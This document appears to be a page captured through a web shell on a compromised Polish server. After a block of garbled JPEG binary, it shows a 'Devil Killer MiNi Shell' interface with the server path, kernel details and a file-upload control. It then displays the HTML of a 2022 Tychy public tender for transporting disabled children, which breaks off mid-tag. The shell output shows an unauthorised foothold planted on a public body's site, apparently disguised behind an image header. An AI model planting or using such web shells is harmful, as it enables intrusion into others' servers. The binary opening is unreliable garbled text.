JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220811/0030152201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci i młodzieży niepełnosprawnej zamieszkałej w Tychach do wskazanych placówek oświatowych i z powrotem wraz z opieką, we wszystkie dni nauki obowiązujące w roku szkolnym 2022/2023. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE CENTRUM OŚWIATY W TYCHACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365004185</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Marszałka Piłsudskiego 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tychy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">032 323 24 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mco.tychy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mcotychy.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci i młodzieży niepełnosprawnej zamieszkałej w Tychach do wskazanych placówek oświatowych i z powrotem wraz z opieką, we wszystkie dni nauki obowiązujące w roku szkolnym 2022/2023. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a16d3e1-193b-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00301522</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020160/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Dowóz dzieci i młodzieży niepełnosprawnej zamieszkałej w Tychach do wskazanych placówek oświatowych i z powrotem wraz z opieką, we wszystkie dni nauki obowiązujące w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal lub e-mail: zamowienia@mco.tychy.pl<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji.<br/>W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa<br/>się elektronicznie za pośrednictwem:<br/>dedykowanego formularza dostępnego na ePUAP, lub<br/>udostępnionego przez miniPortal (Formularz do komunikacji) Korespondencja przesłana za pomocą tego formularza nie może być<br/>szyfrowana, lub e-mail: zamowienia@mco.tychy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z<br/>miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając<br/>z miniPortalu przestrzegać postanowień tego regulaminu.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150 MB.<br/>Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, przyjmuje się datę ich przekazania na skrzynkę<br/>ePUAP.<br/>W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa<br/>się elektronicznie za pośrednictwem:<br/>dedykowanego formularza dostępnego na ePUAP, lub<br/>udostępnionego przez miniPortal (Formularz do komunikacji) Korespondencja przesłana za pomocą tego formularza nie może być<br/>szyfrowana, lub e-mail: zamowienia@mco.tychy.pl<br/>Za datę przekazania korespondencji innej niż oferta i załączniki do oferty, przyjmuje się datę dostarczenia wiadomości na wskazany<br/>adres e-mail, udostępnionego przez miniPortal Formularza do komunikacji oraz skrzynkę ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1. Administratorem danych osobowych jest Miejskie Centrum Oświaty w Tychach, al. Piłsudskiego 12, 43 100 Tychy, 2. W sprawach związanych z ochroną danych osobowych można się skontaktować się z Inspektorem Danych Osobowych w następujący sposób: pod adresem poczty elektronicznej: iod-tychy@n-serwis.pl lub telefonicznie +48327007499 3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO - przepisu prawa w postaci ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego<br/>oraz ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych w związku z koniecznością przestrzegania zasady wynikającej z przepisów ustawy o finansach publicznych, tj. w celu dokonywania wydatków w sposób celowy i oszczędny z zachowaniem uzyskiwania najlepszych efektów z danych nakładów. 4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 8 oraz art. 96 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp” , ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej oraz podmioty, które świadczą Zamawiającemu wsparcie techniczne w szczególności w zakresie wykorzystywanych systemów teleinformatycznych. 5. Pani/ Pana dane osobowe będą przetwarzane w następujących celach:1) przeprowadzenia postępowania dotyczącego udzielenia zamówienia publicznego;<br/>2) archiwizacji dokumentacji.<br/>Podstawą prawna przetwarzania danych osobowych jest obowiązek prawny administratora (art.6 ust. 1 lit. c rozporządzenia),<br/>wynikający z przepisów prawa:<br/>• ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz aktów wykonawczych do ustawy;<br/>• ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/><br/>6. Dane osobowe będą przechowywane jedynie w okresie niezbędnym do spełnienia celu, dla którego zostały zebrane lub w okresie<br/>wskazanym przepisami prawa zamówienia, jednak nie krócej niż do 4 lat od dnia zakończenia postępowania. Następnie dane<br/>osobowe zostaną zarchiwizowane zgodnie z obowiązującymi przepisami prawa. W przypadku unieważnienia postępowania o<br/>udzielenia zamówienia publicznego Pani/Pana dane będą przetwarzane do momentu wygaśnięcia obowiązków przetwarzania<br/>danych wynikających z przepisów prawa, w tym przepisów dotyczących archiwizacji.<br/>7. Obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawcy/Podwykonawcy/Podmiotu, na zasoby, którego<br/>powołuje się Wykonawca, jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>8. W odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO;<br/>9. Osoba udostępniająca dane posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania z śop.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MCO-SZP.261.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 64400 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie przewozu dzieci i młodzieży niepełnosprawnej zamieszkałej na terenie Miasta Tychy, do wskazanych placówek oświatowych i z powrotem, wraz z zapewnieniem im opieki w czasie dowożenia we wszystkie dni nauki obowiązujące w roku szkolnym 2022/2023. Zamówienie będzie zrealizowane w terminie od dnia 01 września 2022 r. do 23 czerwca 2023 r. tj. 186 dni na trasie Tychy – Katowice/ Katowice – Tychy <br/><br/>Pojazd do transportu dzieci i uczniów powinien spełniać normy dopuszczalnej emisji spalin – norma Euro 6.<br/><br/>1.1.	Trasa Tychy – Katowice/ Katowice – Tychy<br/><br/>Placówka 1: Zespół Szkolno-Przedszkolny dla Dzieci Niesłyszących i Słabo Słyszących w Katowicach <br/>ul. Grażyńskiego 17, 40-126 Katowice<br/>Przewidywana liczba dowożonych dzieci: 5<br/>Informacje dodatkowe dzieci poruszające się samodzielnie<br/><br/>Placówka 2: Niepubliczna Szkoła Podstawowa „Nasza Szkoła”, ul. Harcerzy Września 1939 nr 5, <br/>40-659 Katowice<br/>Przewidywana liczba dowożonych dzieci: 1<br/>Informacje dodatkowe: dziecko poruszające się samodzielnie<br/><br/>Placówka 3: Szkoła Podstawowa nr 60 im. Marii Grzegorzewskiej Specjalna w Katowicach, <br/>ul. Bolesława Chrobrego 4 , 40-881 Katowice<br/>Przewidywana liczba dowożonych dzieci: 1<br/>Informacje dodatkowe: dziecko poruszające się samodzielnie<br/><br/>Wymagana liczba pojazdów: 1 pojazd, który musi pomieścić zakładaną maksymalna liczbę przewożonych dzieci w liczbie 7.<br/>Wymagana liczba osób Wykonawcy: w pojeździe 1 kierowca oraz 1 opiekun <br/>2.	Wykonawca po podpisaniu umowy i uzyskaniu pisemnego wykazu osób uprawnionych do przewozu, <br/>w terminie 10 dni kalendarzowych od rozpoczęcia wykonywania usługi, przedstawi Zamawiającemu optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania dzieci w podróży i jak najkrótsze oczekiwanie w placówce oświatowej. Wykonawca przedstawi 2 rozkłady jazdy na każdej trasie, który będzie uwzględniał dowiezienie i odwiezienie dzieci. Rozkład jazdy dowozu będzie sporządzony chronologicznie <br/>wg kolejności odbioru dzieci i będzie zawierał dane osobowe, przystanek odbioru z miejsca zamieszkania, godzinę odbioru z miejsca zamieszkania, godzinę dowozu do placówki, nazwę placówki oświatowej. Rozkład jazdy odwozu będzie sporządzony chronologicznie wg kolejności odbioru dzieci i będzie zawierał dane osobowe, nazwę placówki, godzinę odebrania z placówki, godzinę dowozu do miejsca zamieszkania, przystanek dowozu. Kolejność odbioru i przewozu dzieci podczas wykonywania zamówienia może ulec zmianie tylko w przypadku zdarzeń losowych, zwolnień lekarskich czy wystąpienia <br/>w danej placówce dni wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno-wychowawczych. Zamawiający dopuszcza dziesięciominutowe odstępstwo od przedstawionych w rozkładzie jazdy czasów odbioru i przewozu dzieci. Zamawiający zastrzega sobie możliwość wezwania Wykonawcy do złożenia stosownych wyjaśnień w sprawie rozkładu jazdy. Ustalony rozkład jazdy podlega zatwierdzeniu przez Zamawiającego. Wszelkie zmiany rozkładu jazdy w trakcie realizacji zamówienia wymagają zgody Zamawiającego.<br/>3.	Zamawiający może dokonać pisemną decyzją korekty zleconych zadań, bez konieczności sporządzania aneksu do umowy, zmieniając rozkład jazdy, trasę linii lub zawieszając niektóre kursy.<br/>4.	W przypadkach nadzwyczajnych, zaistniałych z przyczyn niezależnych od Zamawiającego okoliczności, <br/>a spowodowanych zamknięciem ruchu na drodze, wypadkiem drogowym, klęską żywiołową itp., Zamawiający może zmienić trasę lub rozkład jazdy, a Wykonawca zobowiązuje się do wprowadzenia tych zmian w możliwie najkrótszym czasie.<br/>5.	Dzieci powinny być dowiezione do placówki oświatowej w takim czasie, aby mogły o czasie rozpocząć zajęcia i zabierane zostają, po zakończeniu zajęć szkolnych, przy czym dzieci dowożone razem na danej trasie czekają na siebie w celu umożliwienia wspólnego przewozu. Przewóz dzieci odbywać się będzie <br/>od poniedziałku do piątku każdego tygodnia, w dni nauki szkolnej z wyjątkiem świąt <br/>i innych ustawowo wolnych dni od pracy, a także przerw w realizacji zajęć dydaktyczno-wychowawczych.<br/>6.	Czas dojazdu dziecka z domu do szkoły lub ze szkoły do domu nie może przekroczyć 60 minut (w jedną stronę).<br/>7.	W ramach przedmiotowego zamówienia Wykonawca będzie zobowiązany do kompleksowej organizacji przewozów, w tym także do skontaktowania się z rodzicami lub opiekunami prawnymi dziecka przed rozpoczęciem przewozu dzieci, w celu uzyskania od nich informacji niezbędnych do prawidłowej i rzetelnej realizacji zadania oraz przekazania im numeru telefonu umożliwiającego bezproblemowy kontakt <br/>z Wykonawcą.<br/>8.	Zamawiający zastrzega, że podana ilość dzieci na poszczególnej trasie jest liczbą szacunkową i może ulec zmianie w trakcie realizacji zamówienia. W przypadku zwiększenia liczby przewożonych dzieci Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie, a ponadto: <br/>1)	gdy dotychczasowy pojazd nie ma możliwości przewozu większej liczby dzieci Wykonawca zobowiązany jest zapewnić większy pojazd o parametrach odpowiadających wymogom w ust. 11 i 12,<br/>2)	w przypadku gdy nowa osoba porusza się na wózku inwalidzkim, Wykonawca zobowiązany jest zapewnić pojazd wyposażony w specjalistyczny sprzęt tj. podnośnik/najazd lub nisko usytuowane wejście do pojazdu szyny, rampy lub windy, blokady, pasy do mocowania wózków. <br/>Zamawiający nie przewiduje ponoszenia dodatkowych opłat z tego tytułu. <br/>9.	Maksymalna liczba przewożonych dzieci dla:<br/>•	trasa Tychy – Katowice/ Katowice - Tychy – wynosi: 7<br/>z tym, że Wykonawca nie może przekraczać dopuszczalnych limitów przepisów ruchu drogowego. <br/>W przypadku gdy liczba dzieci przekroczy maksymalną liczbę miejsc w pojazdach, Wykonawca zobowiązany jest do takiego zaplanowania trasy przejazdu, żeby jednorazowo w pojeździe nie nastąpiło przekroczenie maksymalnej liczby pasażerów.<br/>10.	Wykaz placówek może ulec zmianie od września 2022 roku a także w trakcie roku szkolnego 2022/2023. <br/>W przypadku tej zmiany Wykonawca musi zapewnić dowóz na warunkach podanych w ofercie <br/>a tym, samym Zamawiający nie przewiduje ponoszenia dodatkowych kosztów.<br/>11.	Pojazd uczestniczący w ruchu, który będzie świadczył usługę musi być tak zbudowany, wyposażony <br/>i utrzymany, aby korzystanie z niego: nie zagrażało bezpieczeństwu osób nim jadących lub innych uczestników ruchu, nie naruszało porządku ruchu na drodze i nie narażało kogokolwiek na szkodę, a także były przygotowane do przewozu osób niepełnosprawnych.<br/>12.	Pojazd, którym Wykonawca będzie świadczył usługę musi spełniać następujące wymagania:<br/>1)	pojazd będzie w pełni sprawny technicznie i będzie posiadać aktualne badania techniczne potwierdzone odpowiednim wpisem w dowodzie rejestracyjnym; <br/>2)	pojazd będzie specjalnie oznakowany jako przewóz osób niepełnosprawnych, a w przypadku gdy przewożona osoba porusza się na wózku inwalidzkim wyposażonym w specjalistyczny sprzęt tj. podnośnik/najazd lub nisko usytuowane wejście do pojazdu szyny, rampy lub windy, blokady, pasy do mocowania wózków. <br/>3)	pojazd będzie wyprodukowany nie wcześniej niż w 2015 r.<br/>13.	W przypadku awarii pojazdu na trasie, Wykonawca zapewni zabranie pasażerów z miejsca awarii pojazdem zastępczym o parametrach odpowiadających wymogom w pkt. 12 i 13 w czasie do 30 minut od momentu awarii i dowiezienie ich do celu podróży.<br/>14.	W przypadku braku możliwości wykonania pracy przewozowej pojazdem określonym w umowie, Wykonawca niezwłocznie wykona przewóz innym pojazdem zastępczym o parametrach odpowiadających wymogom określonym w pkt. 12 i 13.<br/>15.	Wymagania pojazdu do przewozu dzieci na trasie: <br/>•	trasa Tychy – Katowice/ Katowice - Tychy - dysponuje co najmniej 1 pojazdem, który będzie przystosowany do przewozu co najmniej 6 dzieci poruszających się samodzielnie,<br/>16.	Wykonawca umożliwi Zamawiającemu niezwłoczne otrzymywanie informacji o wszelkich kwestiach związanych z przewozem, a dotyczących ewentualnych opóźnień, awarii, zmiany trasy itp., udostępniając telefon bezpośredni czynny w godzinach świadczenia usługi przewidzianych rozkładem jazdy oraz adres <br/>e-mail do kontaktu. Jednocześnie Wykonawca zobowiązuje się do niezwłocznego poinformowania, Zamawiającego o ewentualnej zmianie tego numeru telefonu.<br/>17.	Wymagane jest, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej i od nieszczęśliwych wypadków w zakresie prowadzonej działalności gospodarczej. W przypadku, gdy ubezpieczenie obejmuje krótszy okres niż czas trwania umowy, oświadczenie, że Wykonawca ubezpieczy się w zakresie j.w. na czas minimum do końca realizacji usługi będącej przedmiotem zamówienia. <br/>18.	W przypadku zastrzeżeń dotyczących stanu technicznego pojazdu Wykonawcy, Zamawiający ma prawo zlecenia przeprowadzenia badań technicznych poprzez wskazaną przez siebie stację kontroli pojazdów. <br/>W razie potwierdzenia nienależytego stanu technicznego pojazdu koszty przeprowadzonych badań diagnostycznych ponosi Wykonawca, który w takim przypadku zobowiązany jest niezwłocznie zapewnić pojazd zastępczy w celu realizacji niniejszej umowy.<br/>19.	Zamawiający ma prawo do kontroli pojazdu, dokumentacji pojazdu i kierowcy oraz wszelkich spraw związanych z realizacją umowy, zaś Wykonawca zobowiązuje się w wyznaczonym terminie poddać tejże kontroli.<br/>20.	Zamawiający ma prawo do doraźnej kontroli (bez wcześniejszego zawiadomienia) pojazdu, dokumentacji pojazdu i kierowcy, liczby przewożonych dzieci oraz wszelkich spraw związanych z realizacją umowy, zaś Wykonawca zobowiązuje się poddać tejże kontroli. W uzasadnionych przypadkach Zamawiający może uczestniczyć na wybranej trasie przewozu.<br/>21.	Rodzice dzieci/prawni opiekunowie, a także dyrektorzy placówek oświatowych, do których przewożone są dzieci uprawnieni są do zgłaszania Zamawiającemu wszelkich nieprawidłowości związanych z realizacją niniejszej umowy, a w szczególności dotyczących stanu technicznego pojazdów oraz opieki nad dziećmi <br/>w trakcie świadczenia usługi. Zgłoszenie nieprawidłowości, o których mowa powyżej powinno nastąpić w formie pisemnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 